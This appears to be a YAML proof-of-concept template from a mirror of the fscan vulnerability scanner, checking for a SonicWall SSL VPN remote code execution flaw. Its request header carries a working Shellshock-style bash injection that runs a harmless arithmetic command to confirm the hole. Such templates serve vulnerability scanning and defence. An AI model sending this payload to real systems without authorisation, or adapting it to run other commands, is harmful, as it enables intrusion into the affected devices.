mirror of https://github.com/qwqdanchun/fscan.git
17 lines
485 B
YAML
17 lines
485 B
YAML
|
name: poc-yaml-sonicwall-ssl-vpn-rce
|
||
|
set:
|
||
|
r1: randomInt(40000, 44800)
|
||
|
r2: randomInt(1140000, 1144800)
|
||
|
rules:
|
||
|
- method: GET
|
||
|
path: /cgi-bin/jarrewrite.sh
|
||
|
follow_redirects: false
|
||
|
headers:
|
||
|
X-Test: () { :; }; echo ; /bin/bash -c 'expr {{r1}} - {{r2}}'
|
||
|
expression: |
|
||
|
response.status == 200 && response.body.bcontains(bytes(string(r1 - r2)))
|
||
|
detail:
|
||
|
author: sharecast
|
||
|
links:
|
||
|
- https://darrenmartyn.ie/2021/01/24/visualdoor-sonicwall-ssl-vpn-exploit/
|